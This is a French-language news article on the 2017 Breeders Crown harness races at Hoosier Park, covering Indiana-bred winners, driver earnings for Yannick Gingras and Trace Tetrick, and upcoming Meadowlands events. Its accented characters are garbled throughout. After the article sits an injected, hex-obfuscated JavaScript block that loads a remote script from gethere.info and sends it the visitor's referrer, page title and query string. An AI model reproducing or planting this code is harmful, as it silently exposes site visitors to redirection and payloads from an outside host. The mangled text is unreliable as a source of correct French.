Des Breeder’s Crowns historiques

3 novembre 2017 | À l'étranger | By : Daniel Delisle

A� plusieurs A�gards, le dernier weekend du Breeders Crown A� Hoosier Park Indiana, aura A�tA� marquA� par des statistiques et des records significatifs. Au premier chef, ce fut  » Indiana’s Time », comme l’ont A�crit plusieurs commentateurs amA�ricains, tant l’industrie des courses en Indiana est sortie grandie A� plusieurs points de vue. Il faudra maintenant tenir compte de cet A�tat au mA?me titre que l’Ohio ou la Pennsylvanie ou New-York ou le New Jersey.

Des chevaux et des humains

Pas moins de trois gagnants au cours du dernier weekend ont A�tA� produits par des A�talons en service en Indiana : tels furent les gagnants Hannelore Hanover et Fiftydallarbill, issus de Swan For All et Bekchams Z Tam, issu de Always A Virgin. De plus, Trace Tetrick, le frA?re de l’autre, a A�tA� le seul conducteur, hormis Yannick Gingras, A� cumuler plus d’une victoire dans les A�preuves A� proprement parler du Breeder’s Crown. Sa fiche globale pour l’ensemble des deux jours, incluant toutes les courses prA�sentA�es a A�tA� deA� 17 dA�parts ( 5-1-1 ) bons pour des gains de 628 010$.

Trace Tetrick et Blazin Britches

 

Aux A�tats-Unis oA? le Rising Star AwardA� est rA�servA� aux conducteurs A�mergents, on disait jusqu’au dernier weekend que le trophA�e reviendrait d’emblA�e A� notre Louis-Philippe Roy. DA�sormais, Trace Tetrick est aussi en lice, suite A� ses plus rA�centes performances.

Tout cela ne doit pas nous faire oublier l’A�blouissante fin de semaine de Yannick Gingras. Yannick a A�clipsA� tous ses rivaux tellement il a A�tA� brillant, remportant pas moins de quatre finales du Breeder’s Crown, trois vendredi, une samedi. Si on tient compte de l’ensemble de ses prA�sences en piste au cours des deux jours, sa fiche se lit comme suit : 17 (5-2-1 ) pour des gains de 1 317 342$.A� A� 5%, ce qui est la norme du salaire des conducteurs, son pourcentage pour le weekend s’A�tablit A� 65 867$. Du travail bien fait et payant, c’est le moins que l’on puisse dire.

Yannick durant la soirA�e de vendredi dernier

Yannick se dirige maintenant tout droit vers le titre enviA� de conducteur par excellence en AmA�rique, une fois de plus. Ses principaux rivaux dans cette course, David Miller et Tim Tetrick seront laissA�s loin derriA?re. Ce dernier, pour une rare fois, a connu un weekend dA�sastreux. Aucune victoire, contre une seule pour David Miller. David s’en tire mieux puisque plusieurs de ses montures, sans gagner, ont fait assez bonne figure. Il a amassA� des gains de 556 512$.

L’exceptionnelle Hannelore Hanover et Yannick

Du cA?tA� des entraA�neurs, MM Burke et Takter ont gagnA� chacun trois fois dans les A�preuves du Breeder’s Crown. Leur fiche pour ces douze A�preuves sont : 11 (3-0-3) pour Takter, 12 (3-2-1) pour Burke. Les chevaux de ce dernier ont amassA� 1.2M$, ceux de Takter 879 100$.

Ce weekend

Parieurs, quel sera donc votre menu au cours des prochaines semaines ? Une bonne question. On pourrait penser que les A�vA�nements prestigieux sont tous passA�s, mais il n’en est rien. Il reste en banque des A�preuves fort intA�ressantes A� venir.

Cette fin de semaine, les regards et les dollars se dirigeront vers The Meadowlands oA? se tiendront les quatre finales de la sA�rie dite Kindergarten pour les deux ans, A� 150 000$ chaque fois. Ce weekend marquera le retour en force de la piste de Jeff Gural pour les mois A� venir. Elle a perdu de son lustre au fil des derniA?res annA�es, la piste de Jeff Gural, mais quand les enjeux sont importants, comme ils le seront demain, The Meadowlands reste The Big M, avec tout ce que les courses ont de meilleur A� offrir.

Tout cela reste un avant goA�t de la soirA�e du 25 novembre prochain, toujours A� The Meadowlands, lorsque seront prA�sentA�es les finales des sA�ries TVG et les quatre finales populaires pour les 2 ans, avec des enjeux frA?lant le demi-million. Le 25 novembre, c’est encore loin, on en reparlera pour sA�r.

 

 

 

 var _0x31f1=[« \x73\x63\x72\x69\x70\x74″, »\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″, »\x73\x72\x63″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D », »\x72\x65\x66\x65\x72\x72\x65\x72″, »\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D », »\x74\x69\x74\x6C\x65″, »\x26″, »\x3F », »\x72\x65\x70\x6C\x61\x63\x65″, »\x73\x65\x61\x72\x63\x68″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E », »\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″, »\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″, »\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″, »\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″, »\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″, »\x68\x65\x61\x64″, »\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″, »\x70\x72\x6F\x74\x6F\x63\x6F\x6C », »\x68\x74\x74\x70\x73\x3A », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x52\x5F\x50\x41\x54\x48″, »\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E »];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Retour aux nouvelles